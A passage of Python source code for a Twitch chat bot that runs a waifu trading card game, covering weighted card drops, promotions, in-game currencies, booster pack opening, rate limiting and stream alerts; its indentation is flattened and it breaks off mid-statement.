if cardrarity is None:
cardrarity = baserarity
if waifuname is None:
waifuname = waifuData['name']
promoteDiff = cardrarity - baserarity
promoteStars = (" (" + ("★" * (promoteDiff)) + ")") if promoteDiff > 0 else ""
retStr = "[%d][%s%s] %s" % (
waifuid, config["rarity" + str(cardrarity) + "Name"], promoteStars, waifuname)
return retStr
def sendSetAlert(channel, user, name, waifus, pudding, discord=True):
logger.info("Alerting for set claim %s", name)
with busyLock:
with db.cursor() as cur:
chanOwner = str(channel).replace("#", "")
cur.execute("SELECT config, val FROM alertConfig WHERE channelName = %s", [chanOwner])
rows = cur.fetchall()
alertconfig = {row[0]: row[1] for row in rows}
alertChannel = "donation" if "alertChannel" not in alertconfig else alertconfig["alertChannel"]
defaultSound = config["alertSound"] if "defaultSound" not in alertconfig else alertconfig["defaultSound"]
alertSound = defaultSound if "setClaimSound" not in alertconfig else alertconfig["setClaimSound"]
defaultLength = config["alertDuration"] if "defaultLength" not in alertconfig else alertconfig["defaultLength"]
alertLength = defaultLength if "setClaimLength" not in alertconfig else alertconfig["setClaimLength"]
message = "{user} claimed the set {name}!".format(user=user, name=name)
alertbody = {"type": alertChannel, "sound_href": alertSound, "duration": int(alertLength), "message": message}
threading.Thread(target=sendStreamlabsAlert, args=(channel, alertbody)).start()
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A set has been completed!",
"color": int(config["rarity" + str(int(config["numNormalRarities"]) - 1) + "EmbedColor"])
},
{
"type": "rich",
"title": "{user} completed the set {name}!".format(user=str(user), name=name),
"description": "They gathered {waifus} and received {pudding} pudding as their reward.".format(waifus=naturalJoinNames(waifus), pudding=str(pudding)),
"url": "https://twitch.tv/{name}".format(name=str(channel).replace("#", "").lower()),
"color": int(config["rarity" + str(int(config["numNormalRarities"]) - 1) + "EmbedColor"]),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
if discord:
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def followsme(userid):
try:
krakenHeaders = {"Authorization": "OAuth %s" % config["appAccessToken"],
"Accept": "application/vnd.twitchtv.v5+json"}
r = requests.get(
"https://api.twitch.tv/kraken/users/{twitchid}/follows/channels/{myid}".format(twitchid=str(userid),
myid=str(
config["twitchid"])),
headers=krakenHeaders)
j = r.json()
return "channel" in j and "_id" in j["channel"] and int(config["twitchid"]) == int(j["channel"]["_id"])
except Exception:
return False
def getWaifuById(id):
try:
id = int(id)
if id < 1 or id > maxWaifuID():
return None
except ValueError:
return None
cur = db.cursor()
cur.execute("SELECT id, Name, image, base_rarity, series, can_lookup, pulls, last_pull, can_favourite, can_purchase FROM waifus WHERE id=%s",
[id])
row = cur.fetchone()
ret = {"id": row[0], "name": row[1], "image": row[2], "base_rarity": row[3], "series": row[4], "can_lookup": row[5],
"pulls": row[6], "last_pull": row[7], "can_favourite": row[8], "can_purchase": row[9]}
cur.close()
# print("Fetched Waifu from id: " + str(ret))
return ret
def getWaifuOwners(id, rarity):
with db.cursor() as cur:
baseRarityName = config["rarity%dName" % rarity]
cur.execute(
"SELECT users.name, has_waifu.rarity, has_waifu.amount FROM has_waifu JOIN users ON has_waifu.userid = users.id WHERE has_waifu.waifuid = %s ORDER BY has_waifu.rarity DESC, has_waifu.amount DESC, users.name ASC",
[id])
allOwners = cur.fetchall()
# compile per-owner data
ownerData = OrderedDict()
ownedByOwner = {}
for row in allOwners:
if row[0] not in ownerData:
ownerData[row[0]] = []
ownedByOwner[row[0]] = 0
rarityName = config["rarity%dName" % row[1]]
ownerData[row[0]].append(rarityName if row[2] == 1 else "%d %s" % (row[2], rarityName))
ownedByOwner[row[0]] += row[2]
ownerDescriptions = []
for owner in ownerData:
if len(ownerData[owner]) != 1 or baseRarityName not in ownerData[owner] or ownedByOwner[owner] > 1:
# verbose
ownerDescriptions.append(owner + " (" + ", ".join(ownerData[owner]) + ")")
else:
ownerDescriptions.append(owner)
return ownerDescriptions
def hasPoints(userid, amount):
cur = db.cursor()
cur.execute("SELECT points FROM users WHERE id = %s", [userid])
ret = int(cur.fetchone()[0]) >= int(amount)
cur.close()
return ret
def addPoints(userid, amount):
cur = db.cursor()
cur.execute("UPDATE users SET points = points + %s WHERE id = %s", [amount, userid])
cur.close()
def getPuddingBalance(userid):
with db.cursor() as cur:
cur.execute("SELECT puddingCurrent, puddingPrevious, puddingExpiring FROM users WHERE id = %s", [userid])
pinfo = cur.fetchone()
return None if pinfo is None else [int(n) for n in pinfo]
def hasPudding(userid, amount):
bal = getPuddingBalance(userid)
return bal is not None and sum(bal) >= amount
def addPudding(userid, amount):
with db.cursor() as cur:
cur.execute("UPDATE users SET puddingCurrent = puddingCurrent + %s WHERE id = %s", [amount, userid])
def takePudding(userid, amount):
pinfo = getPuddingBalance(userid)
if pinfo is None or sum(pinfo) < amount:
raise ValueError()
# take from the pudding starting from the expiring amount first
idx = 2
while amount > 0:
new_val = max(pinfo[idx] - amount, 0)
amount -= pinfo[idx] - new_val
pinfo[idx] = new_val
idx -= 1
# save the updated values
with db.cursor() as cur:
cur.execute("UPDATE users SET puddingCurrent = %s, puddingPrevious = %s, puddingExpiring = %s WHERE id = %s", pinfo + [userid])
def maxWaifuID():
cur = db.cursor()
cur.execute("SELECT MAX(id) FROM waifus")
ret = int(cur.fetchone()[0])
cur.close()
return ret
def maxBadgeID():
cur = db.cursor()
cur.execute("SELECT MAX(id) FROM badges")
ret = int(cur.fetchone()[0])
cur.close()
return ret
def getUniqueCards(userid):
with db.cursor() as cur:
uniqueRarities = [rarity for rarity in range(int(config["numNormalRarities"])) if
int(config["rarity%dMax" % rarity]) == 1]
if len(uniqueRarities) == 0:
return []
else:
inStr = ",".join(["%s"] * len(uniqueRarities))
cur.execute("SELECT waifuid FROM has_waifu WHERE userid = %s AND rarity IN ({0})".format(inStr),
[userid] + uniqueRarities)
rows = cur.fetchall()
return [row[0] for row in rows]
def dropCard(rarity=-1, upgradeChances=None, useEventWeightings=False, allowDowngrades=True, bannedCards=None):
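# rarity == -1 means "roll the rarity": start at 0 and keep upgrading one tier at a time while the
# per-tier upgrade chance succeeds, then recurse with the chosen rarity. Otherwise draw one card of
# the requested rarity, respecting per-rarity ownership caps and falling back a rarity if none is left.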
random.seed()
if rarity == -1:
maxrarity = int(config["numNormalRarities"]) - 1
if upgradeChances is None:
upgradeChances = [float(config["rarity%dUpgradeChance" % i]) for i in range(maxrarity)]
else:
assert len(upgradeChances) == maxrarity
rarity = 0
while (rarity < maxrarity):
if random.random() < upgradeChances[rarity]:
rarity += 1
else:
break
return dropCard(rarity=rarity, useEventWeightings=useEventWeightings, allowDowngrades=allowDowngrades,
bannedCards=bannedCards)
else:
with db.cursor() as cur:
if bannedCards is not None and len(bannedCards) > 0:
banClause = " AND id NOT IN(" + ",".join(["%s"] * len(bannedCards)) + ")"
else:
banClause = ""
bannedCards = []
raritymax = int(config["rarity" + str(rarity) + "Max"])
weighting_column = "(event_weighting*normal_weighting)" if useEventWeightings else "normal_weighting"
result = None
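# The ORDER BY -LOG(1-RAND())/weight LIMIT 1 pattern below draws a single row with probability
# proportional to its weight (exponential-race weighted sampling, a la Efraimidis-Spirakis).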
if raritymax > 0:
if rarity >= int(config["strongerWeightingMinRarity"]):
cur.execute(
"SELECT id FROM waifus WHERE base_rarity = %s{1} AND (SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE waifuid = waifus.id) + (SELECT COUNT(*) FROM boosters_cards JOIN boosters_opened ON boosters_cards.boosterid=boosters_opened.id WHERE boosters_cards.waifuid = waifus.id AND boosters_opened.status = 'open') < %s AND {0} >= 1 ORDER BY -LOG(1-RAND())/{0} LIMIT 1".format(
weighting_column, banClause), [rarity] + bannedCards + [raritymax])
result = cur.fetchone()
if result is None:
cur.execute(
"SELECT id FROM waifus WHERE base_rarity = %s{1} AND (SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE waifuid = waifus.id) + (SELECT COUNT(*) FROM boosters_cards JOIN boosters_opened ON boosters_cards.boosterid=boosters_opened.id WHERE boosters_cards.waifuid = waifus.id AND boosters_opened.status = 'open') < %s ORDER BY -LOG(1-RAND())/{0} LIMIT 1".format(
weighting_column, banClause), [rarity] + bannedCards + [raritymax])
result = cur.fetchone()
else:
cur.execute(
"SELECT id FROM waifus WHERE base_rarity = %s{1} ORDER BY -LOG(1-RAND())/{0} LIMIT 1".format(
weighting_column, banClause), [rarity] + bannedCards)
result = cur.fetchone()
if result is None:
# no waifus left at this rarity
logger.info("No droppable waifus left at rarity %d" % rarity)
if allowDowngrades:
return dropCard(rarity=rarity - 1, useEventWeightings=useEventWeightings, bannedCards=bannedCards)
else:
return None
else:
return result[0]
def recordPullMetrics(*cards):
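# Bookkeeping for dropped cards: increment pull counts, stamp the pull time, and decay drop
# weightings - cards whose weighting had been boosted above 1 are reset to the baseline of 1,
# while cards already at or below 1 have their weighting divided down further.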
with db.cursor() as cur:
inString = ",".join(["%s"] * len(cards))
pullTime = current_milli_time()
cur.execute(
"UPDATE waifus SET normal_weighting = normal_weighting / %s, pulls = pulls + 1, last_pull = %s WHERE id IN({0}) AND normal_weighting <= 1".format(
inString), [float(config["weighting_increase_amount"])**4, pullTime] + list(cards))
cur.execute(
"UPDATE waifus SET normal_weighting = 1, pulls = pulls + 1, last_pull = %s WHERE id IN({0}) AND normal_weighting > 1".format(
inString), [pullTime] + list(cards))
def giveCard(userid, id, rarity, amount=1):
with db.cursor() as cur:
cur.execute("SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE userid = %s AND waifuid = %s AND rarity = %s",
[userid, id, rarity])
currentAmount = cur.fetchone()[0]
if currentAmount != 0:
cur.execute("UPDATE has_waifu SET amount = amount + %s WHERE userid = %s AND waifuid = %s AND rarity = %s",
[amount, userid, id, rarity])
else:
cur.execute("INSERT INTO has_waifu(userid, waifuid, rarity, amount) VALUES(%s, %s, %s, %s)",
[userid, id, rarity, amount])
def attemptPromotions(*cards):
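# For each dropped card, repeatedly scan owners who hold enough duplicates to promote and convert
# them to the next rarity (respecting the higher rarity's ownership cap), looping until a full pass
# makes no further promotions; alerts are then sent for promotions at or above the configured rarity.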
promosDone = {}
with db.cursor() as cur:
for waifuid in cards:
while True:
usersThisCycle = []
cur.execute(
"SELECT userid, rarity, amount FROM has_waifu JOIN waifus ON has_waifu.waifuid = waifus.id WHERE has_waifu.waifuid = %s AND has_waifu.amount > 1 AND waifus.can_promote = 1 ORDER BY has_waifu.rarity ASC, RAND() ASC",
[waifuid])
candidates = cur.fetchall()
for row in candidates:
if row[0] in usersThisCycle:
continue
userid = row[0]
rarity = row[1]
amount = row[2]
if rarity < int(config["numNormalRarities"]) - 1 and amount >= int(
config["rarity%dPromoteAmount" % rarity]):
promoteAmount = int(config["rarity%dPromoteAmount" % rarity])
amountToMake = amount // promoteAmount
# limit check?
newRarityLimit = int(config["rarity%dMax" % (rarity + 1)])
if newRarityLimit != 0:
cur.execute(
"SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE waifuid = %s AND rarity >= %s",
[waifuid, rarity + 1])
currentOwned = cur.fetchone()[0]
amountToMake = max(min(amountToMake, newRarityLimit - currentOwned), 0)
if amountToMake != 0:
usersThisCycle.append(userid)
leftAtCurrentRarity = amount - (amountToMake * promoteAmount)
# fix quantity of current rarity
if leftAtCurrentRarity == 0:
cur.execute("DELETE FROM has_waifu WHERE userid = %s AND waifuid = %s AND rarity = %s",
[userid, waifuid, rarity])
else:
cur.execute(
"UPDATE has_waifu SET amount = %s WHERE userid = %s AND waifuid = %s AND rarity = %s",
[leftAtCurrentRarity, userid, waifuid, rarity])
# give card(s) at promoted rarity
giveCard(userid, waifuid, rarity + 1, amountToMake)
# update promosDone
if userid not in promosDone:
promosDone[userid] = {}
if waifuid not in promosDone[userid] or promosDone[userid][waifuid] < rarity + 1:
promosDone[userid][waifuid] = rarity + 1
if len(usersThisCycle) == 0:
# nothing changed, we're done
break
# promo alerts
for user in promosDone:
for waifu in promosDone[user]:
if promosDone[user][waifu] >= int(config["promotionAlertMinimumRarity"]):
threading.Thread(target=sendPromotionAlert, args=(user, waifu, promosDone[user][waifu])).start()
def takeCard(userid, id, rarity, amount=1):
with db.cursor() as cur:
cur.execute("SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE userid = %s AND waifuid = %s AND rarity = %s",
[userid, id, rarity])
currentAmount = cur.fetchone()[0]
if currentAmount > amount:
cur.execute("UPDATE has_waifu SET amount = amount - %s WHERE userid = %s AND waifuid = %s AND rarity = %s",
[amount, userid, id, rarity])
elif currentAmount == amount:
cur.execute("DELETE FROM has_waifu WHERE userid = %s AND waifuid = %s AND rarity = %s",
[userid, id, rarity])
else:
raise ValueError(
"Couldn't remove %d of waifu %s at rarity %s from user %s as they don't own it/that many!" % (
amount, str(id), str(rarity), str(userid)))
def logDrop(userid, waifuid, rarity, source, channel, isWhisper):
trueChannel = "$$whisper$$" if isWhisper else channel
cur = db.cursor()
cur.execute("INSERT INTO drops(userid, waifuid, rarity, source, channel, timestamp) VALUES(%s, %s, %s, %s, %s, %s)",
(userid, waifuid, rarity, source, trueChannel, current_milli_time()))
cur.close()
def formatRank(rankNum):
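# Ordinal suffixes: 1 -> "1st", 2 -> "2nd", 3 -> "3rd", 4 -> "4th", 11/12/13 -> "11th"/"12th"/"13th", 21 -> "21st".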
if (rankNum % 100) // 10 == 1 or rankNum % 10 == 0 or rankNum % 10 > 3:
return "%dth" % rankNum
elif rankNum % 10 == 1:
return "%dst" % rankNum
elif rankNum % 10 == 2:
return "%dnd" % rankNum
else:
return "%drd" % rankNum
memes = ["🤔", "🏆", "✌", "🌲", "🍀", "🖐", "👌", "🤑", "🤣", "🎄"]
def formatTimeDelta(ms):
baseRepr = str(datetime.timedelta(milliseconds=int(ms), microseconds=0))
output = baseRepr[:-3] if "." in baseRepr else baseRepr
if "memeMode" in config and config["memeMode"] == "meme":
for i in range(10):
output = output.replace(str(i), memes[i])
return output
def parseRarity(input):
try:
rarity = int(input)
except Exception:
if input.lower() in revrarity:
rarity = revrarity[input.lower()]
else:
raise ValueError(input)
if rarity < 0 or rarity >= int(config["numNormalRarities"]) + int(config["numSpecialRarities"]):
raise ValueError(input)
return rarity
def parseBetTime(input):
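# Parses an H:MM:SS(.mmm) string, e.g. "1:23:45.6" -> 1h 23m 45s 600ms -> {"total": 5025600, ...};
# returns None if the input does not match the expected format.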
match = time_regex.fullmatch(input)
if not match:
return None
bet = match.groupdict()
if bet["ms"] is None:
bet["ms"] = "0"
ms = int(bet["ms"] + ("0" * max(3 - len(bet["ms"]), 0)))
total = int(bet["hours"]) * 3600000 + int(bet["minutes"]) * 60000 + int(bet["seconds"]) * 1000 + ms
return {"hours": total // 3600000, "minutes": (total // 60000) % 60, "seconds": (total // 1000) % 60,
"ms": total % 1000, "total": total}
class CardNotInHandException(Exception):
pass
class CardRarityNotInHandException(CardNotInHandException):
pass
class AmbiguousRarityException(Exception):
pass
# given a string specifying a card id + optional rarity, return id+rarity of the hand card matching it
# throw various exceptions for invalid format / card not in hand / ambiguous rarity
def parseHandCardSpecifier(hand, specifier):
if "-" in specifier:
id = int(specifier.split("-", 1)[0])
rarity = parseRarity(specifier.split("-", 1)[1])
foundID = False
for waifu in hand:
if waifu['id'] == id and waifu['rarity'] == rarity:
# done
return {"id": id, "base_rarity": waifu['base_rarity'], "rarity": rarity}
elif waifu['id'] == id:
foundID = True
if foundID:
raise CardRarityNotInHandException()
else:
raise CardNotInHandException()
else:
id = int(specifier)
rarity = None
base_rarity = None
for waifu in hand:
if waifu['id'] == id:
if rarity is None:
rarity = waifu['rarity']
base_rarity = waifu['base_rarity']
else:
raise AmbiguousRarityException()
if rarity is None:
raise CardNotInHandException()
else:
return {"id": id, "base_rarity": base_rarity, "rarity": rarity}
class InvalidBoosterException(Exception):
pass
class CantAffordBoosterException(Exception):
def __init__(self, cost):
super(CantAffordBoosterException, self).__init__()
self.cost = cost
def getPackStats(userid):
with db.cursor() as cur:
cur.execute(
"SELECT bo.boostername, COUNT(*) FROM (SELECT * FROM boosters_opened WHERE userid = %s UNION SELECT * FROM archive_boosters_opened WHERE userid = %s) AS bo JOIN boosters ON (bo.boostername IN(boosters.name, CONCAT('mega', boosters.name))) WHERE boosters.cost > 0 GROUP BY bo.boostername ORDER BY COUNT(*) DESC",
[userid] * 2)
packstats = cur.fetchall()
return packstats
def getSpendings(userid):
with db.cursor() as cur:
cur.execute("SELECT spending FROM users WHERE id = %s", [userid])
result = cur.fetchall()
return int(result[0][0])
def getHandUpgradeLUT():
with db.cursor() as cur:
cur.execute("SELECT slot, spendings FROM handupgrades")
lut = cur.fetchall()
return lut
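# total booster spending required for the user's next hand slot: taken from the handupgrades table,
# with every slot beyond the table costing an extra 1000000 on top of the last entry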
def getNextUpgradeSpendings(userid):
lut = getHandUpgradeLUT()
currSlots = paidHandUpgrades(userid)
paidSlots = currSlots
nextSpendings = 0
while currSlots >= len(lut) - 1:
currSlots -= 1
nextSpendings += 1000000
nextSpendings += lut[currSlots + 1][1]
return nextSpendings
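# grant a hand upgrade if the user's lifetime booster spending has reached the next threshold; returns True if upgraded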
def checkHandUpgrade(userid):
userid = int(userid)
nextSpendings = getNextUpgradeSpendings(userid)
spendings = getSpendings(userid)
logger.debug("next spendings: %d", nextSpendings)
logger.debug("current spendings: %d", spendings)
if spendings >= nextSpendings:
upgradeHand(userid)
logger.debug("Upgraded Hand for %d", userid)
return True
return False
def messageForHandUpgrade(userid, username, bot, channel, isWhisper):
bot.message(channel, "%s, you just got a new hand space from booster spending! naroYay" % username, isWhisper)
def addSpending(userid, amount):
with db.cursor() as cur:
cur.execute("UPDATE users SET spending=spending + %s WHERE id = %s", [amount, userid])
def openBooster(bot, userid, username, display_name, channel, isWhisper, packname, buying=True, mega=False):
with db.cursor() as cur:
rarityColumns = ", ".join(
"rarity" + str(i) + "UpgradeChance" for i in range(int(config["numNormalRarities"]) - 1))
if buying:
cur.execute(
"SELECT listed, buyable, cost, numCards, guaranteeRarity, guaranteeCount, useEventWeightings, maxEventTokens, eventTokenChance, canMega, " + rarityColumns + " FROM boosters WHERE name = %s AND buyable = 1",
[packname])
else:
cur.execute(
"SELECT listed, buyable, cost, numCards, guaranteeRarity, guaranteeCount, useEventWeightings, maxEventTokens, eventTokenChance, canMega, " + rarityColumns + " FROM boosters WHERE name = %s",
[packname])
packinfo = cur.fetchone()
if packinfo is None:
raise InvalidBoosterException()
listed = packinfo[0]
buyable = packinfo[1]
cost = packinfo[2]
numCards = packinfo[3]
pgRarity = packinfo[4]
pgCount = packinfo[5]
useEventWeightings = packinfo[6] != 0
numTokens = packinfo[7]
tokenChance = packinfo[8]
canMega = packinfo[9]
normalChances = packinfo[10:]
if numTokens >= numCards:
raise InvalidBoosterException()
iterations = 1
if mega:
if not canMega:
raise InvalidBoosterException()
iterations = 5
if buying:
if not hasPoints(userid, cost*iterations):
raise CantAffordBoosterException(cost*iterations)
addPoints(userid, -cost*iterations)
minScalingRarity = int(config["pullScalingMinRarity"])
maxScalingRarity = int(config["pullScalingMaxRarity"])
numScalingRarities = maxScalingRarity - minScalingRarity + 1
scalingThresholds = [int(config["pullScalingRarity%dThreshold" % rarity]) for rarity in
range(minScalingRarity, maxScalingRarity + 1)]
cur.execute("SELECT pullScalingData FROM users WHERE id = %s", [userid])
scalingRaw = cur.fetchone()[0]
if scalingRaw is None:
scalingData = [0] * numScalingRarities
else:
scalingData = [int(n) for n in scalingRaw.split(':')]
totalTokensDropped = 0
cards = []
alertwaifus = []
uniques = getUniqueCards(userid)
totalDE = 0
logPackName = "mega" + packname if mega else packname
for iter in range(iterations):
tokensDropped = 0
for n in range(numTokens):
if random.random() < tokenChance:
tokensDropped += 1
totalTokensDropped += tokensDropped
iterDE = 0
for i in range(numCards - tokensDropped):
# scale chances of the card appropriately
currentChances = list(normalChances)
guaranteedRarity = 0
if listed and buyable:
for rarity in range(maxScalingRarity, minScalingRarity - 1, -1):
scaleIdx = rarity - minScalingRarity
if scalingData[scaleIdx] >= scalingThresholds[scaleIdx] * 2:
# guarantee this rarity drops now
if rarity == int(config["numNormalRarities"]) - 1:
currentChances = [1] * len(currentChances)
else:
currentChances = ([1] * rarity) + [
functools.reduce((lambda x, y: x * y), currentChances[:rarity + 1])] + list(
currentChances[rarity + 1:])
guaranteedRarity = rarity
break
elif scalingData[scaleIdx] > scalingThresholds[scaleIdx]:
# make this rarity more likely to drop
oldPromoChance = currentChances[rarity - 1]
currentChances[rarity - 1] = min(currentChances[rarity - 1] * (
(scalingData[scaleIdx] / scalingThresholds[scaleIdx] - 1) * 2 + 1), 1)
if rarity != int(config["numNormalRarities"]) - 1:
# make rarities above this one NOT more likely to drop
currentChances[rarity] /= currentChances[rarity - 1] / oldPromoChance
# account for minrarity for some cards in the pack
if i < pgCount and pgRarity > guaranteedRarity:
if pgRarity == int(config["numNormalRarities"]) - 1:
currentChances = [1] * len(currentChances)
else:
currentChances = ([1] * pgRarity) + [
functools.reduce((lambda x, y: x * y), currentChances[:pgRarity + 1])] + list(
currentChances[pgRarity + 1:])
# actually drop the card
logger.debug("using odds for card %d: %s", i, str(currentChances))
card = int(dropCard(upgradeChances=currentChances, useEventWeightings=useEventWeightings,
bannedCards=uniques + cards))
cards.append(card)
# check its rarity and adjust scaling data
waifu = getWaifuById(card)
iterDE += int(config["rarity%dValue" % waifu['base_rarity']])
if waifu['base_rarity'] >= int(config["drawAlertMinimumRarity"]):
alertwaifus.append(waifu)
if listed and buyable:
for r in range(numScalingRarities):
if r + minScalingRarity != waifu['base_rarity']:
scalingData[r] += cost / (numCards - tokensDropped)
else:
scalingData[r] = 0
logDrop(str(userid), str(card), waifu['base_rarity'], "boosters.%s" % logPackName, channel, isWhisper)
totalDE += iterDE
# did they win a free amount-based reward pack?
if packname in packAmountRewards and iterDE in packAmountRewards[packname]:
reward = packAmountRewards[packname][iterDE]
giveFreeBooster(userid, reward)
msgArgs = (reward, packname, iterDE, reward)
bot.message("#%s" % username, "You won a free %s pack due to getting a %s pack worth %d points. Open it with !freepacks open %s" % msgArgs, True)
cards.sort()
recordPullMetrics(*cards)
addSpending(userid, cost*iterations)
# pity pull data update
cur.execute("UPDATE users SET pullScalingData = %s, eventTokens = eventTokens + %s WHERE id = %s",
[":".join(str(round(n)) for n in scalingData), totalTokensDropped, userid])
# insert opened booster
cur.execute(
"INSERT INTO boosters_opened (userid, boostername, paid, created, status, eventTokens) VALUES(%s, %s, %s, %s, 'open', %s)",
[userid, logPackName, cost if buying else 0, current_milli_time(), totalTokensDropped])
boosterid = cur.lastrowid
cur.executemany("INSERT INTO boosters_cards (boosterid, waifuid) VALUES(%s, %s)",
[(boosterid, card) for card in cards])
# alerts
alertname = display_name if display_name.lower() == username.lower() else "%s (%s)" % (display_name, username)
for w in alertwaifus:
threading.Thread(target=sendDrawAlert, args=(channel, w, alertname)).start()
return boosterid
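# grant the user free pack(s) of the given type, stacking with any they already hold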
def giveFreeBooster(userid, boostername, amount=1):
with db.cursor() as cur:
cur.execute("INSERT INTO freepacks (userid, boostername, remaining, total) VALUES(%s, %s, %s, %s)"
+ " ON DUPLICATE KEY UPDATE remaining = remaining + %s, total = total + %s",
[userid, boostername, amount, amount, amount, amount])
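# rate limit for info commands: separate public/private counters that reset every infoResetPeriod minutes;
# messages the user and returns False once their limit for the current window is used up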
def infoCommandAvailable(userid, username, displayName, bot, channel, isWhisper):
with db.cursor() as cur:
private = isWhisper or channel == '#' + config['username'] or channel == '#' + username
columnName = "Private" if private else "Public"
cur.execute("SELECT infoUsed{0}, infoLastReset{0} FROM users WHERE id = %s".format(columnName), [userid])
limitData = list(cur.fetchone())
timeUntilReset = limitData[1] - (current_milli_time() - int(config["infoResetPeriod"]) * 60000)
if timeUntilReset <= 0:
limitData[0] = 0
cur.execute("UPDATE users SET infoUsed{0} = 0, infoLastReset{0} = %s WHERE id = %s".format(columnName),
[current_milli_time(), userid])
limit = int(config["infoLimit%s" % columnName])
if limitData[0] < limit:
return True
else:
timeDiff = formatTimeDelta(timeUntilReset)
if private:
bot.message(channel,
"%s, you have hit the rate limit for info commands. Please wait %s to use more." % (
displayName, timeDiff), isWhisper)
else:
bot.message(channel,
"%s, you have hit the rate limit for info commands in public chats. Please wait %s to use more or use them via whisper or in the bot's own chat." % (
displayName, timeDiff), isWhisper)
return False
def useInfoCommand(userid, username, channel, isWhisper):
with db.cursor() as cur:
private = isWhisper or channel == '#' + config['username'] or channel == '#' + username
columnName = "Private" if private else "Public"
cur.execute("UPDATE users SET infoUsed{0} = infoUsed{0} + 1 WHERE id = %s".format(columnName), [userid])
def generateRewardsSeed(cycleLength, numGoodRewards):
# generate a reasonable rewards seed
# "reasonable" is defined as the gap between successive good rewards
# being between (CL/NumGood)/2 and (CL/NumGood)*2 every time
# where gap is 1, not 0, for two consecutive good rewards
# uses 0 to (numGoodRewards-1) to represent the good rewards
# and other numbers to represent the bad
hasSeed = False
while not hasSeed:
seed = random.randrange(0, 0x10000000000000000)
if numGoodRewards == 0 or cycleLength == numGoodRewards:
return seed
generator = random.Random(seed)
order = [x for x in range(cycleLength)]
generator.shuffle(order)
hasSeed = True
lastPos = -1
for i in range(int(numGoodRewards)):
pos = lastPos + 1
while order[pos] >= numGoodRewards:
pos += 1
if pos - lastPos <= (cycleLength/numGoodRewards)/2 or pos - lastPos >= (cycleLength/numGoodRewards)*2:
hasSeed = False
break
lastPos = pos
if cycleLength - lastPos >= (cycleLength/numGoodRewards)*2:
hasSeed = False
return seed
# returns (cycle length, number of good rewards) for use elsewhere
def getRewardsMetadata():
with db.cursor() as cur:
cur.execute("SELECT COUNT(*), SUM(IF(is_good != 0, 1, 0)) FROM free_rewards")
return cur.fetchone()
# From https://github.com/Shizmob/pydle/issues/35
class PrivMessageTagSupport(pydle.features.ircv3.TaggedMessageSupport):
def on_raw_privmsg(self, message):
""" PRIVMSG command. """
nick, metadata = self._parse_user(message.source)
tags = message.tags
target, message = message.params
self._sync_user(nick, metadata)
self.on_message(target, nick, message, tags)
if self.is_channel(target):
self.on_channel_message(target, nick, message, tags)
else:
self.on_private_message(nick, message, tags)
# End Github code
NepBotClass = pydle.featurize(pydle.Client, PrivMessageTagSupport)
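# main Twitch chat client: joins the configured channels, tracks chat activity for passive points,
# and dispatches the game's chat commands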
class NepBot(NepBotClass):
config = {}
mychannels = []
instance = None
autoupdate = False
pw = None
nomodalerted = []
addchannels = []
leavechannels = []
emotecooldowns = {}
def __init__(self, config, channels):
super().__init__(config["username"])
self.config = config
self.mychannels = channels
NepBot.instance = self
def on_clearchat(self, message):
# print("Got clear chat message: " + str(message))
nick, metadata = self._parse_user(message.source)
tags = message.tags
params = message.params
logger.debug(
"nick: {nick}; metadata: {metadata}; params: {params}; tags: {tags}".format(nick=nick, metadata=metadata,
params=params, tags=tags))
if len(params) == 1:
logger.info("Chat in %s has been cleared by a moderator.", params[0])
return
u = params[1]
chan = params[0]
reason = "" if "ban-reason" not in tags else str(tags["ban-reason"]).replace("\\s", " ")
if "ban-duration" in tags.keys():
duration = tags["ban-duration"]
logger.info("%s got timed out for %s seconds in %s for: %s", u, duration, chan, reason)
else:
logger.info("%s got permanently banned from %s. Reason: %s", u, chan, reason)
return
def on_hosttarget(self, message):
# print("Got Host Target: " + str(message))
parts = str(message).split(" ")
sourcechannel = parts[2].strip("#")
target = parts[3].strip(":")
if target == "-":
logger.info("%s has stopped hosting", sourcechannel)
else:
logger.info("%s is now hosting %s", sourcechannel, target)
return
def on_userstate(self, message):
# print("Userstate...")
nick, metadata = self._parse_user(message.source)
tags = message.tags
params = message.params
logger.debug(
"nick: {nick}; metadata: {metadata}; params: {params}; tags: {tags}".format(nick=nick, metadata=metadata,
params=params, tags=tags))
if config["username"].lower() == "nepnepbot" and tags["display-name"] == "Nepnepbot" and params[
0] != "#nepnepbot" and tags["mod"] != '1' and params[0] not in self.nomodalerted:
logger.info("No Mod in %s!", str(params[0]))
self.nomodalerted.append(params[0])
self.message(params[0], "Hey! I noticed i am not a mod here! Please do mod me to avoid any issues!")
return
def on_roomstate(self, message):
# print("Got Room State: " + str(message))
return
def on_raw_421(self, message):
# print("Got raw 421:" + str(message))
# Ignore twitch not knowing WHOIS
if str(message).find("WHOIS") > -1:
return
super().on_raw_421(message)
def on_whisper(self, message):
nick, metadata = self._parse_user(message.source)
tags = message.tags
params = message.params
# print("WHISPER received: nick: {nick}; metadata: {metadata}; params: {params}; tags: {tags}".format(nick=nick, metadata=metadata, params=params, tags=tags))
self.on_message("#" + str(nick), str(nick), str(params[1]), tags, isWhisper=True)
def on_unknown(self, message):
if str(message).find("WHISPER") > -1:
self.on_whisper(message)
return
if str(message).find("CLEARCHAT") > -1:
self.on_clearchat(message)
return
if str(message).find("HOSTTARGET") > -1:
self.on_hosttarget(message)
return
if str(message).find("USERSTATE") > -1:
self.on_userstate(message)
return
if str(message).find("ROOMSTATE") > -1:
self.on_roomstate(message)
return
if str(message).find("USERNOTICE") > -1:
logger.info("PogChamp! Someone subbed to someone! here's the message: %s", str(message))
return
super().on_unknown(message)
def start(self, password):
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=password)
self.pw = password
logger.info("Connecting...")
def timer():
with busyLock:
global t
t = Timer(int(config["cycleLength"]), timer)
t.start()
logger.debug("Refreshing Database Connection...")
global db
try:
db.close()
except Exception:
logger.warning("Error closing db connection cleanly, ignoring.")
try:
db = pymysql.connect(host=dbhost, user=dbuser, passwd=dbpw, db=dbname, autocommit="True",
charset="utf8mb4")
except Exception:
logger.error("Error Reconnecting to DB. Skipping Timer Cycle.")
return
with db.cursor() as cur:
# open packs?
cur.execute(
